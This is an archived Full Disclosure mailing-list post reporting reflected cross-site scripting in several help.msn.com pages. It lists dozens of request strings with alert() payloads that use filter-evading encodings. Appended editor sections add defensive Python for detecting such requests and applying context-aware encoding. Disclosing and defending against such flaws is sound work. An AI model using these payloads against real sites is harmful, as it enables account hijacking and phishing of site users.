Full Disclosure mailing list archives

help.msn.com
From: jamie fisher <contact_jamie_fisher () yahoo co uk>
Date: Tue, 7 Dec 2004 10:46:29 +0000 (GMT)

This is gonna be quick'n'dirty.  My dinner is almost cooked...
 
More XSS for MSN to add to the list:
 
1. Cross site scripting (In JavaScript context)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
1.1 GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27Bills Momma%27)%2B%27&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.2 GET /en_au/DirectedHelpControls.asp?DataMarket=%22%2Balert(%27Bills Momma%27)%2B%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.3 /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%27%2Balert(%27Bills Momma%27)%2B%27&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.4 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=%22%2Balert(%27Bills Momma%27)%2B%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
1.5 GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%27%2Balert(%27Bills Momma%27)%2B%27 HTTP/1.0
 
2 Cross site scripting (Standard variants)
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
2.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.2 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
2.3 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
2.4 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>%22%27><img%20src%3d%22javascript:alert(%27Appscan%20-%20CSS%20attack%20may%20be%20used%27)%22>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
3 Cross site scripting (Standard variants)
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
3.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"><script>alert("Bills Momma")</script>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
3.2 GET /en_au/DirectedHelpControls.asp?DataMarket=>%22%27><img%20src%3d%22javascript:alert(%27Bills Momma%27)%22>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4 Cross site scripting using HTML entities
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
4.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
4.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
5 Cross site scripting using HTML entities
 
http://help.msn.com/en_au/DirectedHelpControls.asp
 
5.1 GET /en_au/DirectedHelpControls.asp?DataMarket=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;Bills%26%23x20;Momma%26quot;)>&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/EN_AU/Search/xfind_utf8.asp
 
6.1 GET /EN_AU/Search/xfind_utf8.asp?Search=PIM%5FInbox&S_Text=Click+a+topic%2E&Filter=&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&BrandID=&H_VER=2.6&bITFind=True&xmltoc=&cb=http%3A%2F%2Fhelp%2Emsn%2Ecom%2F%21shared%2Fmsnlogo%2Egif&v4=DH_FREE&v3=&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&market=en_au&bDH=False&RCQ=&bIS=False&ContactUs=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
6.2 GET /EN_AU/Search/xfind_utf8.asp?search=Default+AppScan&INI=HotmailPIMv10.ini&H_APP=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&Filter=&BrandID=&H_VER=2.6&bITFind=True&XMLTOC=&v4=DH_FREE&v3=&bDH=False&bIS=False&cb=http%3A%2F%2Fhelp.msn.com%2F%21shared%2Fmsnlogo.gif&alttoc=MSN_HOTMAIL_PIMv10_ALTTOC.htm&RCQ=&ContactUs=http%3A%2F%2Fsupport.msn.com%2Fcontactus.aspx%3Fproductkey%3Dhotmail HTTP/1.0
 
7 Cross site scripting without using '<' and '>' symbols
 
http://help.msn.com/en_au/directedhelp.asp
 
7.1 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.2 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=%22%20style%3D%22background:url(javascript:alert(%Bills%20Momma%27))%22%20OA%3D%22&v4Var=DH_FREE&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.3 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22&ContactUsURL=http://support.msn.com/contactus.aspx?productkey=hotmail HTTP/1.0
 
7.4 GET /en_au/directedhelp.asp?TMT='+sTMT+'&DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE&ContactUsURL=%22%20style%3D%22background:url(javascript:alert(%27Bills%20Momma%27))%22%20OA%3D%22 HTTP/1.0
 
I won't say how to fix.  The last time I ran XSS by a website (Kevin Mitnick's), some nematode
<http://nematode.unl.edu/wormgen.htm> refuted my mitigating fix.  Bearing in mind the triviality of XSS I really
shouldn't have bothered; but I did.
 
<!--# Greets:
Hulk Hogan, Bills Momma, the homeless guy I pass on my way into the office (who incidentally, will code for food), my keypad, and all the lads on the contract where I am currently -->
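Editor's added example, not part of jamie fisher's post: the four encoding tricks above (items 1, 2, 4 and 6) all defeat a filter that looks at the raw request for "<script" or "javascript:", because the payload is URL-encoded, spelled as numeric HTML entities, or needs no tag at all. The defender-side answer is to decode a parameter the way the browser will (URL-decode until stable, then resolve HTML entities) before matching. The request lines below are constructed to mirror the post's categories with shortened payloads; the pattern names and the `keyword_filter` comparison are my own.

```python
import html
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample request lines modelled on the post's categories (not real
# log data); payloads are shortened and the parameter names are the post's.
SAMPLE_LOG = [
    # item 1: JavaScript string context, no angle brackets anywhere in the request
    "GET /en_au/DirectedHelpControls.asp?DataMarket=%27%2Balert(%27x%27)%2B%27&ITSFile=HotmailPIMv10.its51 HTTP/1.0",
    # item 2: plain tag injection
    'GET /EN_AU/Search/xfind_utf8.asp?Search=PIM_Inbox&H_APP=>"><script>alert("x")</script>&ITSFile=HotmailPIMv10.its51 HTTP/1.0',
    # item 4: "javascript:" spelled as numeric HTML entities, then URL-encoded
    "GET /EN_AU/Search/xfind_utf8.asp?H_APP=>\"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(1)> HTTP/1.0",
    # item 6: attribute break-out with quotes only, no '<' or '>'
    "GET /EN_AU/Search/xfind_utf8.asp?H_APP=%22%20style%3D%22background:url(javascript:alert(1))%22%20OA%3D%22 HTTP/1.0",
    # benign request for comparison
    "GET /en_au/DirectedHelpControls.asp?DataMarket=en_au&ITSFile=HotmailPIMv10.its51&v4Var=DH_FREE HTTP/1.0",
]

# Shapes to look for once a value is decoded the way the browser will see it.
PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "js_scheme": re.compile(r"javascript\s*:", re.I),
    # a quote followed later by an event-handler or style attribute
    "attr_breakout": re.compile(r"""["'][^"']*\b(?:on\w+|style)\s*=""", re.I),
    # quote, '+', call, '+', quote: the item 1 shape inside a JS string literal
    "js_string_breakout": re.compile(r"""["']\s*\+\s*\w+\s*\(.*\)\s*\+\s*["']"""),
}


def normalize(value: str, max_rounds: int = 3) -> str:
    """Decode a query value as the server and browser will: '+' is a space on the
    first pass, further passes catch double encoding (%2527), and HTML entities
    such as &#x6a; are resolved last because the browser resolves them in markup."""
    value = unquote_plus(value)
    for _ in range(max_rounds - 1):
        decoded = unquote(value)  # plain unquote: a '+' that came out of %2B must stay '+'
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def scan_request_line(line: str) -> dict:
    """Map each query parameter whose decoded value matches a pattern to the
    names of the patterns that fired. The protocol is split off from the right
    because several of the post's request lines contain spaces in the target."""
    _method, rest = line.split(" ", 1)
    target, _proto = rest.rsplit(" ", 1)
    query = target.partition("?")[2]
    findings = {}
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        hits = [p for p, rx in PATTERNS.items() if rx.search(normalize(raw))]
        if hits:
            findings[name] = hits
    return findings


def keyword_filter(line: str) -> bool:
    """A signature filter that only checks the raw request for two keywords."""
    lowered = line.lower()
    return "<script" in lowered or "javascript:" in lowered


def scan_log(lines):
    """(index, keyword-filter verdict, decoded findings) for each line, for side-by-side review."""
    return [(i, keyword_filter(l), scan_request_line(l)) for i, l in enumerate(lines)]


if __name__ == "__main__":
    for i, naive, found in scan_log(SAMPLE_LOG):
        print(f"line {i}: keyword filter={naive} decoded findings={found}")
```

Run it and the keyword filter flags only lines 1 and 3, while the decoded scan flags lines 0 to 3 and leaves the benign request alone; the item 4 line is the instructive one, since "javascript:" only exists after both decoding steps.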
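The post declines to say how to fix this, so here is an editor's added example (not the author's, and not the real ASP source) of why the fix is per output context rather than a single filter. The same parameter is reflected in three different places on the pages above: inside a JavaScript string (item 1), as markup (items 2 and 3), and inside a quoted attribute (items 6 and 7, which need no angle brackets at all). The three templates and the shortened payloads are constructed stand-ins; the check uses Python's own HTML parser to decide whether the reflected value is still data or has become a tag, an attribute or code.

```python
import html
import json
import re
from html.parser import HTMLParser

# Constructed templates standing in for where the post's parameters are reflected
# (not the real page source): a text node, a quoted attribute, a JS string literal.
TEMPLATES = {
    "body":      "<h1>Help for {v}</h1>",
    "attribute": '<input name="market" value="{v}">',
    "js_string": "<script>var market = '{v}';</script>",
}

# One representative payload per context, shortened from the post's items 2, 6 and 1.
PAYLOADS = {
    "body":      '><script>alert("x")</script>',
    "attribute": '" style="background:url(javascript:alert(1))" OA="',
    "js_string": "'+alert('x')+'",
}


def strip_angle_brackets(v: str) -> str:
    """The kind of filter that items 6 and 7 of the post are written to get past."""
    return v.replace("<", "").replace(">", "")


def encode_html(v: str) -> str:
    """Right for text nodes and for values inside quoted attributes."""
    return html.escape(v, quote=True)


def encode_js_string(v: str) -> str:
    """Right for data inside a JS string literal: JSON-escape, then hex-escape the
    characters that could end the literal, the <script> element or an enclosing
    attribute. HTML entities are not decoded inside <script>, so HTML-encoding
    here would corrupt the value instead of protecting it."""
    s = json.dumps(v)[1:-1]  # handles backslash, double quote and control characters
    for ch, esc in (("'", "\\x27"), ("<", "\\x3c"), (">", "\\x3e"), ("&", "\\x26")):
        s = s.replace(ch, esc)
    return s


CONTEXT_AWARE = {"body": encode_html, "attribute": encode_html, "js_string": encode_js_string}


class TagCollector(HTMLParser):
    """Records every start tag and its attributes, as a browser's parser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def stays_data(context: str, rendered: str) -> bool:
    """True if the reflected value is still data in its context, False if it has
    become markup or code."""
    if context == "js_string":
        body = re.search(r"<script>(.*)</script>", rendered, re.S).group(1)
        # exactly one string literal, with no unescaped quote inside it
        return re.fullmatch(r"var market = '(?:\\.|[^'\\])*';", body) is not None
    p = TagCollector()
    p.feed(rendered)
    if context == "body":
        return [t for t, _ in p.tags] == ["h1"]
    # attribute context: the one expected tag, carrying only the two expected attributes
    return [t for t, _ in p.tags] == ["input"] and set(p.tags[0][1]) == {"name", "value"}


def render(context: str, filter_fn=None) -> str:
    v = PAYLOADS[context]
    return TEMPLATES[context].format(v=filter_fn(v) if filter_fn else v)


def matrix() -> dict:
    """Per context: does the payload stay data with no filter, with the
    angle-bracket filter, and with the encoder that matches the context?"""
    return {
        ctx: {
            "unfiltered": stays_data(ctx, render(ctx)),
            "strip_angle_brackets": stays_data(ctx, render(ctx, strip_angle_brackets)),
            "context_aware": stays_data(ctx, render(ctx, CONTEXT_AWARE[ctx])),
        }
        for ctx in TEMPLATES
    }


if __name__ == "__main__":
    for ctx, results in matrix().items():
        print(ctx, results)
```

Stripping angle brackets only helps in the text-node case; the attribute and JavaScript-string payloads go through untouched, which is exactly what the post's items 1, 6 and 7 show. Choosing the encoder by where the value lands closes all three.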
 
 
 

